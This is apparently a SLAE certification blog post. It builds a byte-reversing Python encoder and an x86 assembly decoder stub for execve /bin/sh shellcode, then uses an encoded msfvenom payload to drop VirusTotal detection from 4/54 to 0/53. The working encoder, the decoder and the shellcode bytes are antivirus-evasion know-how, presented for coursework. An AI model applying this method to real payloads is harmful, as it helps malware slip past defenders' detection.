SLAE Assignment 4: Custom Encoder Scheme

The 4th assignment of the SLAE certification focuses on creating a custom encoding scheme and requires the following:

  • Create a custom encoding scheme similar to the “Insertion Encoder” example demonstrated in the course
  • Write a proof of concept using the execve-stack shellcode as the payload to encode with your custom scheme.

Encoder Overview

In the SLAE lecture about encoders, Vivek demonstrates how an insertion encoder works.

Insertion Encoding and Decoding

The insertion encoder obfuscates the machine instructions in the shellcode by inserting a chosen character, or characters, between the original instruction Bytes. Inserting these characters changes the signature of the original shellcode, making it less likely to be detected by IPS/IDS or anti-malware software that relies on signature-based detection. Because the shellcode has been encoded, a decoder stub is needed to recover the original instructions before they are executed.
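
To make the idea concrete, here is a minimal Python sketch of an insertion encoder and its matching decoder. It is not the implementation from the course: the function names and the 0xAA marker Byte are my own assumptions, and it inserts exactly one marker after every original Byte.

```python
def insertion_encode(shellcode: bytes, marker: int = 0xAA) -> bytes:
    """Insert `marker` after every original byte (marker value is an assumption)."""
    out = bytearray()
    for b in shellcode:
        out.append(b)
        out.append(marker)
    return bytes(out)


def insertion_decode(encoded: bytes) -> bytes:
    """Keep every second byte, which drops the inserted markers."""
    return encoded[::2]


original = bytes([0x31, 0xC0, 0x50])
encoded = insertion_encode(original)
print(encoded.hex())                          # 31aac0aa50aa
print(insertion_decode(encoded) == original)  # True
```

A real decoder stub does the equivalent of insertion_decode in assembly, in place, before jumping to the recovered instructions.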

Custom Encoder

My solution to the assignment is to encode the original shellcode by reversing the order of its Bytes, i.e. the first Byte becomes the last and the last becomes the first. The custom encoder is written in Python 3.

Custom Encoder: Input

The encoder’s input is the machine code of the shellcode that will be encoded. As in the previous assignments, the Bytes are extracted using the objdump command:

objdump -s ./ | grep -v '^ [0-9a-f][0-9a-f][0-9a-f][0-9a-f] \b' | grep -v 'Contents' | grep -v '^./' | cut -d' ' -f 3-6| sed 's/ //g' | sed '/./!d' | tr -d '\n'| sed 's/.\{2\}/&\\x/g' | sed 's/^/\\x/'|sed 's/..$//'|sed 's/^/"/;s/$/"/g'
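
The tail end of that pipeline only reformats the extracted hex digits into a quoted ‘\x..’ string. As a rough illustration of that final formatting stage, a Python equivalent might look like the sketch below. to_escaped_string is a hypothetical helper, and it assumes the raw Bytes have already been read from the binary by some other means.

```python
def to_escaped_string(raw: bytes) -> str:
    """Format raw bytes as a double-quoted '\\x..' string (hypothetical helper)."""
    return '"' + "".join(f"\\x{b:02x}" for b in raw) + '"'


# Three bytes used purely as an example input.
print(to_escaped_string(bytes([0x31, 0xC0, 0x50])))  # "\x31\xc0\x50"
```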

Custom Encoder: Output

The encoder’s output is the reversed machine code, with each Byte printed in the format used to declare an assembly Byte variable. In the example below, ‘db’ stands for ‘define Byte’.

reversed_code db 0x80

Multiple Bytes can be declared by adding a ‘,’ between the Bytes. The example below declares 5 Bytes.

reversed_code db 0x80,0xcd,0x0b,0xb0,0xe1

The encoded machine instructions will be inserted into the decoder shellcode. The encoder’s output must use this format because the encoded shellcode is stored as a sequence of Byte-sized values in a variable within the decoder stub.
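
As a small sketch of that output format, the helper below builds a complete ‘db’ line from a sequence of Bytes. to_db_line is a name I have made up for illustration; the actual encoder script prints only the comma-separated values.

```python
def to_db_line(data: bytes, name: str = "reversed_code") -> str:
    """Build a NASM-style 'define Byte' line (hypothetical helper)."""
    return f"{name} db " + ",".join(f"0x{b:02x}" for b in data)


print(to_db_line(bytes([0x80, 0xCD, 0x0B, 0xB0, 0xE1])))
# reversed_code db 0x80,0xcd,0x0b,0xb0,0xe1
```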

Custom Encoder script

The encoder script is relatively straightforward and has been commented throughout. The script performs the following steps:

  • Checks for the required number of arguments
  • Splits the shellcode command line parameter string into a list using ‘\x’ as the separator
    • It then deletes the first item in the list, as it holds whatever precedes the first ‘\x’ rather than a Byte
  • Loops through the reversed list, adding the characters required to convert the Bytes into assembly variable values which can be used in the decoder

The encoding script is as follows:

import sys

#--------------------------------------------------------------------------------
# Initial Processing of Command-Line Arguments
#--------------------------------------------------------------------------------
if len(sys.argv) != 2:
    print("Usage: python3 reverse-encode.py \"<shellcode>\" Note: The double quotes are required")
    sys.exit(1)
# Store Command Line Arguments
path, shellcode = sys.argv

#--------------------------------------------------------------------------------
# Remove '\x' from the shellcode string
#--------------------------------------------------------------------------------
# Splitting on '\x' leaves one list item per Byte, e.g. ['', '31', 'c0', ...]
shellcode = shellcode.split("\\x")
# The first item is whatever preceded the first '\x', not a Byte
del shellcode[0]

# Declare required variables
encoded2 = ""

#--------------------------------------------------------------------------------
# Loop through the reversed list and add the required characters for the
# Encoded assembly string variables
#--------------------------------------------------------------------------------

for x in reversed(shellcode):
    # Concatenate '0x' to the string
    encoded2 += '0x'
    # Concatenate the current Byte to the string
    encoded2 += x
    # Concatenate ',' to the string
    encoded2 += ','

#--------------------------------------------------------------------------------
# Final correction of encoded instructions strings
#--------------------------------------------------------------------------------

# Remove the trailing ',' from the string
encoded2 = encoded2[0:-1]
print('\n')
# Print the encoded instructions string
print(encoded2)
sys.exit()

Custom Encoder Usage

The script is run using the command below, with the shellcode string passed in double quotes as its only argument:

python3 reverse-encode.py

Encoded shellcode Instructions

The encoder is now up and running, so let’s use it to encode the machine code instructions for the execve-stack shellcode. The execve-stack machine instructions are as follows:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

Running the Python encoder gives the following encoded output:

0x80,0xcd,0x0b,0xb0,0xe1,0x89,0x53,0xe2,0x89,0x50,0xe3,0x89,0x6e,0x69,0x62,0x2f,0x68,0x68,0x73,0x2f,0x2f,0x68,0x50,0xc0,0x31
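
A quick way to sanity-check the encoder output is to parse both strings back into Bytes and confirm that one is the exact reverse of the other. The snippet below is only a sketch of such a check and is not part of the encoder script; the variable names are my own.

```python
# The original execve-stack shellcode and the encoder output shown above.
original = (
    r"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = (
    "0x80,0xcd,0x0b,0xb0,0xe1,0x89,0x53,0xe2,0x89,0x50,0xe3,0x89,0x6e,"
    "0x69,0x62,0x2f,0x68,0x68,0x73,0x2f,0x2f,0x68,0x50,0xc0,0x31"
)

# Drop the empty item before the first '\x', then convert each hex pair.
original_bytes = bytes(int(h, 16) for h in original.split("\\x")[1:])
# int() accepts the '0x' prefix when the base is 16.
encoded_bytes = bytes(int(h, 16) for h in encoded.split(","))

print(len(original_bytes))                    # 25
print(encoded_bytes[::-1] == original_bytes)  # True
```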

The encoded instructions are now ready to be used in the decoder.

Custom Decoder Stub

Decoding Process

When the decoder stub is executed it ‘reverse decodes’ the shellcode instructions so they can be executed in the correct order.

I tested a number of approaches to reversing the instructions as they are copied onto the stack. The approach I chose was to copy the reversed shellcode variable, from its 1st Byte to its last Byte, onto the stack using movsb.

The movsb instruction works in the following way:

  • Copies a single Byte from the memory address held in the ESI register to the memory address held in the EDI register.
  • Automatically increments the ESI and EDI registers (when the direction flag is clear) so that the next Byte can be copied

Incrementing the source register, ESI, works because the reversed_code variable is iterated from its 1st to its last Byte. However, incrementing the destination register moves the stack reference lower on the stack, i.e. to a higher memory address, so the data currently stored on the stack would be overwritten. It is possible to reverse the direction in which movsb copies, so that the source and destination are both decremented after each move instruction. However, this results in the same problem, but with the reversed_code variable pointer moving in the wrong direction.

My solution to this problem is to ‘dec’ the destination register twice after each movsb instruction, which moves the EDI register up the stack, i.e. to the next lower Byte in memory. When the entire reversed shellcode variable has been copied, the destination register EDI will be pointing 1 Byte lower than the first decoded shellcode instruction. Therefore, all that has to be done to execute the shellcode is to increment the EDI register and then jump to it.
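
The effect of ‘movsb; dec edi; dec edi’ can be modelled in a few lines of Python. This is only a simulation under simplifying assumptions: memory is a small bytearray, the addresses are made-up indexes rather than real stack addresses, and reverse_copy is a hypothetical name.

```python
def reverse_copy(src: bytes, mem: bytearray, edi: int) -> int:
    """Mimic 'movsb; dec edi; dec edi' for every byte of src.

    Returns the index of the first decoded byte (EDI after the final inc).
    """
    esi = 0
    for _ in range(len(src)):
        mem[edi] = src[esi]  # movsb copies one byte ...
        esi += 1             # ... and increments ESI
        edi += 1             # ... and EDI
        edi -= 2             # dec edi twice: net move of one byte downwards
    return edi + 1           # inc edi: EDI stopped one byte below the shellcode


reversed_code = bytes([0x80, 0xCD, 0x0B, 0xB0, 0xE1])
mem = bytearray(16)          # stand-in for the stack area
start = reverse_copy(reversed_code, mem, edi=10)
print(start)                      # 6
print(mem[start:start + 5].hex()) # e1b00bcd80
```

The Bytes end up in their original order at ascending addresses, which is what allows execution to start at the returned location.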

The diagram below shows the reversed_code variable and the decoded shellcode on the stack.

[Image: variable-and-stack-memory]

Decoder Stub Overview

The custom decoder stub has been written in assembly. It performs the following steps:

1. Get the memory address of the encoded shellcode

  • Use jmp-call-pop to get the memory address of the encoded shellcode variable

2. Calculate the length of the encoded shellcode

  • Use jmp-call-pop to get the memory address of the NOP instruction that follows the call instruction placed after the shellcode variable
  • Subtract the length of the call instruction minus 1
  • Subtract the address of the encoded shellcode to get the loop counter, which is the shellcode length plus 1
  • Calculate the end location for the shellcode
  • Get current ESP value
  • Subtract 80 Bytes from the ESP value to ensure the shellcode doesn’t overwrite the current stack

3. ‘Reverse’ Decode the shellcode

  • Copy a Byte from the reversed_code variable onto the stack
  • Adjust the destination register by decrementing it twice
  • Decrement the counter variable
  • Test to see if the entire shellcode has been ‘decoded’/copied
    • If not, loop again
    • Once the copying is complete, increment the EDI register so that it points to the first decoded shellcode instruction on the stack
  • Jump to the address held in the EDI register
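
The length calculation in step 2 and the loop test in step 3 fit together in a way that is easy to get wrong by one, so here is a small Python model of the arithmetic. It assumes the call is a 5 Byte near call placed directly after the shellcode variable, and the address used is an arbitrary example, not one taken from a real run.

```python
CALL_LEN = 5  # near 'call rel32' on x86: 1 opcode byte + 4 offset bytes


def loop_iterations(reversed_code_addr: int, shellcode_len: int) -> int:
    """Count how many bytes the decode loop copies (shellcode_len must be >= 1)."""
    # Return address pushed by 'call decode_length': the NOP after the call.
    nop_addr = reversed_code_addr + shellcode_len + CALL_LEN
    ecx = nop_addr - 0x4       # sub ecx, 0x4
    ecx -= reversed_code_addr  # sub ecx, esi  -> shellcode_len + 1
    copied = 0
    while True:
        copied += 1            # movsb
        ecx -= 1               # sub ecx, 0x1
        if ecx == 1:           # cmp ecx, 0x1 ; jne falls through when equal
            break
    return copied


print(loop_iterations(0x08048080, 25))  # 25
```

Because the counter starts one higher than the shellcode length and the loop stops when it reaches 1, every Byte is copied exactly once.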

Reverse Decode Stub Instructions

global _start
_start:
    jmp short encoded_shellcode ; Initiate JMP-call-pop
decode:
    pop esi                     ; Save the memory address of the reversed_code 
                                ; string used by movsb
    jmp short shellcode_length  ; Initiate JMP-call-pop

; Setup for decoding the shellcode
decode_length:
    pop ecx         ; Store the location of the nop instruction 
                    ; after 'call decode_length'
    sub ecx, 0x4    ; Subtract the size of the 'call decode_length' instruction 
                    ; (5 Bytes) minus '1'
    sub ecx, esi    ; Calculate the length of the encoded shellcode plus '1' 
                    ; and store it in ECX to be used as the Loop counter
    mov edi, esp    ; Set the destination for movsb. 
    sub edi, 0x50   ; Move the end of the shellcode further away from the 
                    ; top of the stack to add padding space

decode_loop:
    movsb           ; Copy one Byte from [ESI] to [EDI], then increment both
    dec edi         ; Decrement the destination twice as required due to 
                    ; the string being reversed
    dec edi         ; 
    sub ecx, 0x1    ; Decrement the loop counter variable
    cmp ecx, 0x1    ; Test to see if the entire string has been copied 
                    ; to the stack
    jne decode_loop ; Jump when not equal to 0x1
    inc edi         ; Move the EDI register to point at the first Byte 
                    ; of the shellcode; the loop leaves EDI pointing at 
                    ; the next location to be written, which is 1 Byte 
                    ; lower than the shellcode
    jmp edi         ; Jump to EDI to execute the decoded shellcode

encoded_shellcode:
    call decode
    reversed_code db 0x41   ; reverse-encode.py output set here.

shellcode_length:
    call decode_length  ; jmp-CALL-pop
    nop                 ; NOP instruction used to calculate the length 
                        ; of the shellcode which must be decoded

Setting up the Decoder

The decoder is complete, and the output from the reverse-encode.py script can be added to the reverse-decode.nasm file, which is then assembled and linked using the following script:

#!/bin/bash
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
echo '[+] Linking ...'
ld -z execstack -o $1 $1.o
echo '[+] Done!'

Testing the custom decoder

Once the custom decoder is assembled and linked it can be tested by simply running it. In the screenshot:

  • The decoder is executed and it creates a new shell.
  • The ls command is run, which displays the contents of the folder /home/user01
  • cd .. moves the current directory up one level
  • ls displays the contents of /home
  • The shell is exited and the original terminal continues to run

[Screenshot: testing]

Does the encoding work?

I guess the reason for encoding the shellcode is to see if it can evade anti-virus software or IDS/IPS systems. So for the final part of this assignment I’m going to:

  • Generate the execve shellcode using Metasploit’s msfvenom
  • Encode the payload instructions
  • Assemble the reverse-decode shellcode
  • Upload it to VirusTotal to see if it is detected.

Find msfvenom payload and required options.

Use the following command to get the list of msfvenom payloads.

msfvenom -l payloads | grep linux/x86

The one we want is ‘linux/x86/exec’. Its options are listed using:

msfvenom -a x86 --platform linux -p linux/x86/exec --payload-options

I just need to set the program which will be executed, /bin/sh, and set the output format to C so that the machine instructions are written out.

msfvenom -a x86 --platform linux -p linux/x86/exec CMD=/bin/sh -f c -o msfvenom_exec.txt
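
The C-formatted output is a quoted array that is usually split across several lines, whereas reverse-encode.py expects a single ‘\x..’ string. A sketch of how the Byte pairs could be pulled out and joined is shown below. c_array_to_escaped is a hypothetical helper, and the sample text is made up to show the layout; it is not real msfvenom output.

```python
import re


def c_array_to_escaped(text: str) -> str:
    """Join every '\\xNN' pair found in C-style source into one string."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return "".join(f"\\x{p}" for p in pairs)


# Illustrative layout only, not an actual payload.
sample = r'''unsigned char buf[] =
"\x31\xc0\x50"
"\x68\x2f";'''

print(c_array_to_escaped(sample))  # \x31\xc0\x50\x68\x2f
```

The resulting string can then be passed, in double quotes, to the encoder script.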

Finally, I put the instructions into a C source file, compile it and test that the shellcode works. As can be seen it works OK, but it must contain NULL Bytes, as the reported length of the shellcode is only 15 Bytes.
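
The reasoning behind that conclusion is that a C string length stops counting at the first NULL Byte. The sketch below models this in Python, assuming the C test program measures the shellcode with strlen, which is my assumption and is not shown here. The payload Bytes are invented for the example.

```python
def c_strlen(buf: bytes) -> int:
    """Count bytes up to, but not including, the first NUL, like C's strlen."""
    idx = buf.find(b"\x00")
    return len(buf) if idx == -1 else idx


# Made-up bytes with a NUL in the middle, not the msfvenom payload.
payload = bytes([0x6A, 0x0B, 0x58, 0x00, 0x41, 0x42])
print(c_strlen(payload), len(payload))  # 3 6
```

A reported length that is shorter than the real payload is therefore a hint that a NULL Byte sits at that offset.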

[Screenshot: slae_a4_msfvenom_shellcode]

The shellcode is uploaded to VirusTotal to see what the detection rate is like. We find that 4/54 anti-virus engines detect the shellcode as malicious.

[Screenshot: slae_a4_virus_total_msfvenom_execve]

Now, I’ll encode the instructions and assemble them into the reverse-decode shellcode. The detection rate at VirusTotal has dropped from 4/54 to 0/53. What’s interesting is that one of the engines wasn’t able to scan this file, even though it is in essence the same as the previous shellcode, which all 54 anti-virus engines scanned successfully.

[Screenshot: slae_a4_virus_total_encoded_execve]

Source Code

The source code for the shellcode, reverse-encode.py and reverse-decode.nasm can be found in the following GitHub repository:

https://github.com/raidersofthelostarg/slae/tree/master/assignment-4

SLAE Student Details

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-793
